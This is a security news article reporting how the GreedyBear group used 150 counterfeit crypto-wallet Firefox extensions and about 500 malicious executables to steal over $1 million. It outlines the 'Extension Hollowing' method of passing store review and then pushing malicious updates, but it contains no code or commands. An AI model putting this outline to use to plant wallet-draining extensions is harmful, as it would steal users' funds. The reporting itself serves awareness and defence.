How GreedyBear's Weaponized Browser Extensions Compromised Over $1M in Crypto Holdings

A sophisticated cybercriminal operation has been unmasked by Koi Security researchers, revealing an extensive campaign orchestrated by the Russian threat group GreedyBear. Over a five-week period ending in August, the attackers successfully siphoned more than $1 million in cryptocurrency through a multi-layered attack infrastructure.

The Arsenal: 150 Browser Extensions and 500+ Malicious Files

The scale of this operation was staggering. GreedyBear deployed 150 weaponized Firefox extensions, distributed across dozens of deceptive websites designed to mimic legitimate platforms. In parallel, the hackers stole tokens from support infrastructure by leveraging nearly 500 malicious Windows executables uploaded to Russian software repositories that host pirated and repackaged applications. According to Idan Dardikman, CTO at Koi Security, the Firefox-based assault proved to be the most lucrative vector, generating the majority of the $1 million haul.

The Wallet Spoofing Technique

The primary mechanism involved creating counterfeit versions of popular cryptocurrency wallets. The hackers targeted MetaMask, Exodus, Rabby Wallet, and TronLink—among the most widely used self-custody solutions in the crypto ecosystem.

The attackers employed a sophisticated technique called Extension Hollowing to circumvent marketplace security reviews. The process worked in stages: first, they submitted a legitimate-appearing version of the extension to the official store, passing initial vetting. Once approved, the application received incremental updates containing malicious code that went undetected by automated systems. To bolster credibility, the threat actors fabricated positive user reviews, creating an illusion of trustworthiness that encouraged downloads.

Credential Theft and Beyond

Once unsuspecting users installed the compromised extensions, the malware immediately began harvesting wallet credentials and private keys. These stolen access credentials became the keys to the kingdom—attackers then used them to drain cryptocurrency holdings from the compromised wallets.

Beyond browser-based attacks, the malicious executables distributed on Russian software mirrors served as delivery mechanisms for a broader toolkit including credential stealers, ransomware, and various Trojan variants. This diversified approach ensured multiple pathways to compromise target systems and extract sensitive data.

The campaign underscores a critical vulnerability in the security chain: the trust users place in official-looking extensions and the relative ease with which threat actors can exploit the update mechanisms of legitimate software distribution channels.